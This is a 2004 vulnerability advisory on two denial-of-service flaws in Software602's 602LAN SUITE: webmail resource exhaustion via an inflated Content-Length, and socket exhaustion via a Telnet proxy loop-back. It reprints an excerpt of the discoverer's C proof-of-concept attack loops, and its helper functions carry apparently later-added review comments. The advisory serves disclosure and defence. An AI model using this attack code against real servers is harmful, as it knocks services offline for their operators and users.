Denial of Service (DoS) in Software602's 602LAN SUITE
Multiple Denial of Service (DoS) vulnerabilities have been discovered in Software602's 602LAN SUITE version 2004.0.04.0909 and prior.
November 9, 2004
Reported November 7, 2004, by Luigi Auriemma
VERSIONS AFFECTED
602LAN SUITE version 2004.0.04.0909 and prior.
DESCRIPTION
Multiple Denial of Service (DoS) vulnerabilities have been discovered in Software602's 602LAN SUITE version 2004.0.04.0909 and prior. These two vulnerabilities include:
Resource consumption through Web mail
An attacker can use the Web mail service (/mail) to consume the remote server's CPU and memory. The attacker uses a POST request with a Content-Length value that specifies the desired amount of memory to consume.
Sockets consumption through a Telnet proxy loop
The Telnet proxy is vulnerable to a loop-back attack. It correctly prevents user requests from connecting to the IP address 127.0.0.1, but it doesn't apply the same filter to the server's other network interfaces, so an attacker can force the server to connect to its own local IP addresses, thus consuming all its sockets.
DEMONSTRATION
The discoverer posted the following code as a proof of concept (reproduced here as an excerpt):
1) {
pcklen = sprintf(pck, MEM,EATRAM);
printf(
"-CPU and memory consumption attack: note that the RAM on the server will"
"start to be eaten after about 15 seconds, so wait and keep sysmon orother"
"resource monitors opened on the server to watch the real effects"
"Will be eaten %d bytes of memory for each connection",
EATRAM>> 20);
for(;;) {
sd =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd< 0) std_err();
fputs("-connection: ", stdout);
if(connect(sd,(struct sockaddr *)&peer, sizeof(peer))
<0) std_err();
if(send(sd,pck, pcklen, 0)
<0) std_err();
if(timeout(sd,1) < 0) {
fputs("ok",stdout);
} else{
fputs("rejected",stdout);
}
close(sd);
}
} else if(attack
2) {
pcklen = sprintf(pck,"%s:%dr", inet_ntoa(peer.sin_addr), port);
fputs(
"-sockets consumption attack: when you will see no new output on thescreen"
"means the server has finished all its available sockets",
stdout);
sd = socket(AF_INET,SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr*)&peer, sizeof(peer))
< 0) std_err();
for(;;) {
if(send(sd,pck, pcklen, 0)
<0) std_err();
if(timeout(sd,3) < 0) {
fputs("Serverseems vulnerable!", stdout);
}
len =recv(sd, buff, BUFFSZ, 0);
if(len< 0) std_err();
if(!len)break;
buff[len]= 0x00;
printf("%s",buff);
}
close(sd);
fputs("Server doesn'tseem vulnerable", stdout);
} else {
fputs("Error: you mustchoose an attack, 1 or 2", stdout);
}
return(0);
}
int timeout(int sock, int secs) {
    /*
     * Blocks until `sock` is readable or `secs` seconds have elapsed,
     * whichever comes first.
     *
     * Returns 0 when select() reported the descriptor ready and -1 when
     * the wait ran out. A negative select() result is treated as fatal and
     * handed to std_err(), which reports errno and exits.
     *
     * NOTE(review): FD_SET on a descriptor >= FD_SETSIZE is undefined
     * behaviour; that bound is not checked here.
     */
    fd_set want_read;
    struct timeval deadline;
    int ready;

    deadline.tv_sec = secs;
    deadline.tv_usec = 0;

    FD_ZERO(&want_read);
    FD_SET(sock, &want_read);

    ready = select(sock + 1, &want_read, NULL, NULL, &deadline);
    if(ready < 0) std_err();

    return(ready == 0 ? -1 : 0);
}
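u_long resolv(char *host) {
    /*
     * Resolves `host` (a dotted-quad literal or a hostname) to an IPv4
     * address in network byte order. Literals are converted by inet_addr();
     * anything else is looked up with gethostbyname(). Failure to resolve
     * is fatal: an error is printed and the process exits with status 1.
     *
     * Fix: the original read the first address as `*(u_long*)(hp->h_addr)`.
     * On platforms where u_long is wider than 32 bits that cast over-reads
     * the 4-byte address entry (and aliases a char buffer as u_long). The
     * entry is read through struct in_addr instead, which is the object
     * gethostbyname() stores for AF_INET, after checking that the result
     * really is an AF_INET address of the expected length.
     *
     * Note: inet_addr() returns INADDR_NONE for "255.255.255.255" as well
     * as for invalid input, so that literal falls through to a DNS lookup.
     */
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip != INADDR_NONE) return(host_ip);

    hp = gethostbyname(host);
    if(!hp || !hp->h_addr_list || !hp->h_addr_list[0]
      || hp->h_addrtype != AF_INET
      || hp->h_length != (int)sizeof(struct in_addr)) {
        printf("Error:Unable to resolve hostname (%s)", host);
        exit(1);
    }
    host_ip = ((struct in_addr *)hp->h_addr_list[0])->s_addr;
    return(host_ip);
}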
#ifndef WIN32
void std_err(void) {
    /*
     * Fatal-error exit: prints the current errno description under the
     * "Error" prefix and terminates the process with status 1. Compiled
     * only when WIN32 is not defined; presumably a Windows-specific
     * variant lives elsewhere in the file (not visible here).
     */
    perror("Error");
    exit(1);
}
#endif
VENDOR RESPONSE
Software602 advises users to upgrade to 602LAN SUITE version 2004.0.04.1104 or later.
CREDIT
Discovered by Luigi Auriemma.